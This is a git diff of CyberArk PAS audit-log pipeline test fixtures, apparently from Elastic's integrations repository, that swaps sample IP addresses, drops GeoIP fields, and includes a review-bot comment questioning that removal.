Password","GatewayStation":"67.43.156.13","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 
06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T10:31:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:54\n 2021-03-15T10:31:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:54","IsoTimestamp":"2021-03-15T10:31:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T14:08:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:26\n 2021-03-15T14:08:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
07:08:26","IsoTimestamp":"2021-03-15T14:08:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-16T10:04:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:49\n 2021-03-16T10:04:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.13\n \n \n \n \n \n Use Password\n 67.43.156.15\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:49","IsoTimestamp":"2021-03-16T10:04:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"67.43.156.15","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json
index 53efc258bab..7960201337d 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-308-use-password.log-expected.json
@@ -75,7 +75,7 @@ "event": { "severity": 2, "reason": "(Action: Connect)", - "ingested": "2021-06-09T10:24:32.348976500Z", + "ingested": "2021-12-09T13:36:52.374483400Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.6\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Connect)\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.2.0.3\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" 
Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"308\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.6\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Connect)\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"10.2.0.3\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating 
System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "308", "kind": "event", @@ -100,20 +100,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -136,7 +127,7 @@ }, "@timestamp": "2021-03-11T17:38:12.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -148,8 +139,8 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { 
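Review bot: Dropping `destination.geo` with no replacement in the `@@ -100,20 +100,11 @@` hunk means the regenerated fixture no longer asserts GeoIP enrichment of `destination.ip` at all, and the same removal recurs in the `@@ -208,20 +199,11 @@` and `@@ -316,20 +298,11 @@` hunks. If the pipeline's geoip processor is still meant to run on `destination.ip`, the new value `67.43.156.15` would presumably resolve against the bundled test database rather than to nothing, so this looks worth confirming before merge — it may indicate the fixture was regenerated without a GeoIP database, or that the processor is conditioned so this address is skipped, and geo fields are commonly relied on by downstream detection content. Separately, `event.ingested` is rewritten in every `@@` hunk of this file; marking it as a dynamic field in the pipeline test config would keep future fixture diffs limited to meaningful changes.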
@@ -157,20 +148,20 @@ "severity": "Info", "reason": "fun and profit", "iso_timestamp": "2021-03-11T17:38:12Z", - "gateway_station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:12\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:12Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003efun and profit\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n 
\u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:12\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:12Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003efun and profit\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": 
"Administrator", "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "127.0.0.1", "action": "Use Password", 
@@ -184,8 +175,8 @@ "event": { "severity": 2, "reason": "fun and profit", - "ingested": "2021-06-09T10:24:32.348991100Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:12\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:12Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003efun and profit\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:12\",\"IsoTimestamp\":\"2021-03-11T17:38:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"fun and profit\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"81.32.170.205\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374492200Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:12\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:12Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse 
Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003efun and profit\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:12\",\"IsoTimestamp\":\"2021-03-11T17:38:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"fun and profit\",\"ExtraDetails\":\"\",\"Message\":\"Use 
Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -208,20 +199,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -244,7 +226,7 @@ }, "@timestamp": "2021-03-11T17:46:49.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -256,8 +238,8 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -265,20 +247,20 @@ "severity": "Info", "reason": "FOR FUN.", "iso_timestamp": "2021-03-11T17:46:49Z", - "gateway_station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:46:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:46:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eFOR FUN.\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n 
